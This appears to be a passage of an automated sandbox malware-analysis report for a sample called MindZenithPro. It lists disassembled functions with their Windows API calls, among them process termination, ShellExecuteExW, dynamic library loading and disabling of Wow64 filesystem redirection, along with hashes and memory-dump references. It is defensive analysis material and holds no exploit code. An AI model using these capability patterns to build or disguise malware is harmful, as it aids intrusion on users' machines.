                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: c720f89f876941357067998586c064b699ee903cedf0d5d985fa7f657d1cf6a6
                                    • Instruction ID: 60fda69c2c48379c29bea41a5e1989878b5ab602679896cca9f05329e61cbb78
                                    • Opcode Fuzzy Hash: c720f89f876941357067998586c064b699ee903cedf0d5d985fa7f657d1cf6a6
                                    • Instruction Fuzzy Hash: B801F5B6A0A3B17EE7272A767C8DA6A3B94EB06735731033DF5104B0E1EF214D025244
                                    Function 003F30C4 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,003F2858,00489B18,0000000C,003E3248,00000001,?,?), ref: 003F30C8
                                    • _free.LIBCMT ref: 003F30FB
                                    • _free.LIBCMT ref: 003F3123
                                    • SetLastError.KERNEL32(00000000), ref: 003F3130
                                    • SetLastError.KERNEL32(00000000), ref: 003F313C
                                    • _abort.LIBCMT ref: 003F3142
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: f26bfac1bc72ed71465748abf11e6096f8773f14263fb1d1f0ba9de8d178b303
                                    • Instruction ID: 7f409656e11b2f5864a84f6f3a6246d9e7439583d6e0c2f4aabb007afe16e74d
                                    • Opcode Fuzzy Hash: f26bfac1bc72ed71465748abf11e6096f8773f14263fb1d1f0ba9de8d178b303
                                    • Instruction Fuzzy Hash: 1AF0283190460967D63377346C0AE7F26299FC1761F310535FF29DA1A2EF24CE014156
                                    Function 00459110 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003D98C9
                                      • Part of subcall function 003D986F: SelectObject.GDI32(?,00000000), ref: 003D98D8
                                      • Part of subcall function 003D986F: BeginPath.GDI32(?), ref: 003D98EF
                                      • Part of subcall function 003D986F: SelectObject.GDI32(?,00000000), ref: 003D9918
                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 0045913A
                                    • LineTo.GDI32(?,00000003,00000000), ref: 0045914E
                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 0045915C
                                    • LineTo.GDI32(?,00000000,00000003), ref: 0045916C
                                    • EndPath.GDI32(?), ref: 0045917C
                                    • StrokePath.GDI32(?), ref: 0045918C
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 77efb9be82dae2d2bc9b9ce04dad719e2597b7d6abb3a8e1374eb188e5797a1f
                                    • Instruction ID: 0ce7efd7090410747d7901c1366dcffbb12e5deb677bb611af1bd3641fff78c7
                                    • Opcode Fuzzy Hash: 77efb9be82dae2d2bc9b9ce04dad719e2597b7d6abb3a8e1374eb188e5797a1f
                                    • Instruction Fuzzy Hash: B511097240021DBFEB129F90DC88E9A7F6DEF08355F048022BA098A1A1C771DD559BA4
                                    Function 004258F6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00425911
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00425922
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00425929
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00425931
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00425948
                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 0042595A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: 852f4264f4631f5587daaee9ffe2c38c9da94c85ca176efd39ac5ddf8eaee6d9
                                    • Instruction ID: a8a1ceeefb58e6658aa366d88611b36c590b1459aa9d40bf8f00234a74ef57d4
                                    • Opcode Fuzzy Hash: 852f4264f4631f5587daaee9ffe2c38c9da94c85ca176efd39ac5ddf8eaee6d9
                                    • Instruction Fuzzy Hash: 0E018475E00718BBEB109BE59C49E5E7FB8EF45751F044076FA08AB281D670D801CB54
                                    Function 003C2A8D Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003C2ABE
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 003C2AC6
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003C2AD1
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003C2ADC
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 003C2AE4
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C2AEC
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 778285dca7466344925be412086042da123bee7db437ab336d2d9516b0ca8dcb
                                    • Instruction ID: 7ed92da44addf98058db03c0ebb3f3d57e1f4326846df777c85bb326bbcea835
                                    • Opcode Fuzzy Hash: 778285dca7466344925be412086042da123bee7db437ab336d2d9516b0ca8dcb
                                    • Instruction Fuzzy Hash: D10167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                    Function 0042F161 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0042F171
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0042F187
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0042F196
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0042F1A5
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0042F1AF
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0042F1B6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 40a9a5e745abc1fd8cf855cfa5e14e179a08e2826b922d6f93c79f37b7e99411
                                    • Instruction ID: 36fd938922035da588ea2414a2cfd55c7aa610c8df445c6fc4c9768be9202f2c
                                    • Opcode Fuzzy Hash: 40a9a5e745abc1fd8cf855cfa5e14e179a08e2826b922d6f93c79f37b7e99411
                                    • Instruction Fuzzy Hash: BCF01D32641658BBE73157529C0EEEB3B7CEFC6B12F000069F601D119196A09A42C6B9
                                    Function 00417A49 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 00417A62
                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00417A79
                                    • GetWindowDC.USER32(?), ref: 00417A85
                                    • GetPixel.GDI32(00000000,?,?), ref: 00417A94
                                    • ReleaseDC.USER32(?,00000000), ref: 00417AA6
                                    • GetSysColor.USER32(00000005), ref: 00417AC0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                    • String ID:
                                    • API String ID: 272304278-0
                                    • Opcode ID: 0fbc901eda69cecce0d227c5ac6a8d73dfef99c1e79e35cecdd7096baa995c03
                                    • Instruction ID: bdf3e2d826788694735a5a285ecc02279b1a694d0fe4348a41d038cece339e02
                                    • Opcode Fuzzy Hash: 0fbc901eda69cecce0d227c5ac6a8d73dfef99c1e79e35cecdd7096baa995c03
                                    • Instruction Fuzzy Hash: 6D012832904209BFDB619BA0DC08BEE7BB5FF48312F150071F925A21A1CB305E829B19
                                    Function 0044B4EB Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0044B62A
                                      • Part of subcall function 003C3914: _wcslen.LIBCMT ref: 003C3919
                                    • GetProcessId.KERNEL32(00000000), ref: 0044B6BF
                                    • CloseHandle.KERNEL32(00000000), ref: 0044B6EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                    • String ID: <$@
                                    • API String ID: 146682121-1426351568
                                    • Opcode ID: 4193944a9818257cc6d1f88b929ce35ebf6fd05980b9a856b6bac3de16a6306e
                                    • Instruction ID: 5c782c0cb3e24eaf220327099b7e404482ee54372b59a011241e3efd00d3fe9a
                                    • Opcode Fuzzy Hash: 4193944a9818257cc6d1f88b929ce35ebf6fd05980b9a856b6bac3de16a6306e
                                    • Instruction Fuzzy Hash: 45716671A00619DFDB15EF64C484A9EBBF1FF08304F04849AE856AB3A2CB74ED41CB95
                                    Function 00427897 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004278FF
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00427935
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00427946
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004279C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 970669f88483f1ea99da070f8f94cee29352a8dac266df9cbee33fc96a1c5b7c
                                    • Instruction ID: 1acef7a7ab0966af1f31fb94ab788d504765a2cd6f4461550ff52d656ce8dcc2
                                    • Opcode Fuzzy Hash: 970669f88483f1ea99da070f8f94cee29352a8dac266df9cbee33fc96a1c5b7c
                                    • Instruction Fuzzy Hash: A3419CB1604315EFEF14DF54D884A9A7BA9EF48314F5080AEE9059F206D7B9D980CBA8
                                    Function 0045453A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004545F3
                                    • IsMenu.USER32(?), ref: 00454608
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00454650
                                    • DrawMenuBar.USER32 ref: 00454663
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert
                                    • String ID: 0
                                    • API String ID: 3076010158-4108050209
                                    • Opcode ID: c3909e234f0cc023904936d39f60649bb3eea59df61e8d5764b12264518da6a0
                                    • Instruction ID: 3f3f955e3e6efecc4aba2c3c5441a31f8cf80d674ce294959fa81f55b9c84069
                                    • Opcode Fuzzy Hash: c3909e234f0cc023904936d39f60649bb3eea59df61e8d5764b12264518da6a0
                                    • Instruction Fuzzy Hash: 60414974A01209EFDB20CF50D884EAABBB8FF85319F04412AED159B352D778ED88CB54
                                    Function 004224C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00422548
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0042255B
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0042258B
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 2081771294-1403004172
                                    • Opcode ID: 9594e3586015886193b88fabaabb1de7d053f25433c3ada5d9efde5eaf087ba7
                                    • Instruction ID: 0ee2e59edb1fc2dcf0bfef28fefb3ad3760e620740766804558e0ea9047413a0
                                    • Opcode Fuzzy Hash: 9594e3586015886193b88fabaabb1de7d053f25433c3ada5d9efde5eaf087ba7
                                    • Instruction Fuzzy Hash: 47213A71A00114BEDB16ABA0DC86DFF7768DF45314F50851AF811DB2E1CB7C5D4A8714
                                    Function 004536D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0045374B
                                    • LoadLibraryW.KERNEL32(?), ref: 00453752
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00453767
                                    • DestroyWindow.USER32(?), ref: 0045376F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                    • String ID: SysAnimate32
                                    • API String ID: 3529120543-1011021900
                                    • Opcode ID: 08dd08feae781f83e6b9aa5f70bd30fc7b5d43c2673cadde9a5b823531b9fc92
                                    • Instruction ID: beac2029def799fbb2f50499eea8b3bf6ebe51d8f98168847fdcec4f2d45e373
                                    • Opcode Fuzzy Hash: 08dd08feae781f83e6b9aa5f70bd30fc7b5d43c2673cadde9a5b823531b9fc92
                                    • Instruction Fuzzy Hash: 8821C2B1900205BBEB204FB4DC84EBB37A9EF483ABF10862AFD10D2291D335CD459754
                                    Function 003E50BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003E506E,00000003,?,003E500E,00000003,004898A8,0000000C,003E5165,00000003,00000002), ref: 003E50DD
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003E50F0
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,003E506E,00000003,?,003E500E,00000003,004898A8,0000000C,003E5165,00000003,00000002,00000000), ref: 003E5113
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 626f8dab5f69acbaff4604594b1d374e155460a7a819e893da12c9108c165c7d
                                    • Instruction ID: 25eac7e9e3907cde503bb92fab24714a13f0e3448685f63b9dcfb79300ce7ad9
                                    • Opcode Fuzzy Hash: 626f8dab5f69acbaff4604594b1d374e155460a7a819e893da12c9108c165c7d
                                    • Instruction Fuzzy Hash: ECF0AF31E00618BBDB219F92DC49BADBBB4EF04716F050169F809A21A0DB309980CB99
                                    Function 0041E63A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 0041E647
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0041E659
                                    • FreeLibrary.KERNEL32(00000000), ref: 0041E67F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: GetSystemWow64DirectoryW$X64
                                    • API String ID: 145871493-2590602151
                                    • Opcode ID: 1b2ee500bca10a4b8d8623739af565737f3c71669b03f78afeaa65677dbf3317
                                    • Instruction ID: e7122c4675a31ee7be23a9048fb36fe293bfc9bab0b3f64fe48c6ddeb6eca8ec
                                    • Opcode Fuzzy Hash: 1b2ee500bca10a4b8d8623739af565737f3c71669b03f78afeaa65677dbf3317
                                    • Instruction Fuzzy Hash: 81E0EC79805A21EBC73157718C449AE76146F10B00B904067EC05E5116EB38CD80CB5D
                                    Function 003C54A3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C54F0,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C54AF
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003C54C1
                                    • FreeLibrary.KERNEL32(00000000,?,?,003C54F0,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C54D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-3689287502
                                    • Opcode ID: af9b9c3f63d9faffd6eb07ea6667135a50dbbc0dba0430d5c059f58184362f67
                                    • Instruction ID: 5a0f328f26601b4d4f9bc5c80d71a939c7c80e16a092a9ca5c3a0083c4e48169
                                    • Opcode Fuzzy Hash: af9b9c3f63d9faffd6eb07ea6667135a50dbbc0dba0430d5c059f58184362f67
                                    • Instruction Fuzzy Hash: 5DE0CD35E01F221792371716BC08F5E66159FC1F237174029FE05D2108DF54DC8182E9
                                    Function 003C546C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0040466F,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C5475
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003C5487
                                    • FreeLibrary.KERNEL32(00000000,?,?,0040466F,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C549A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
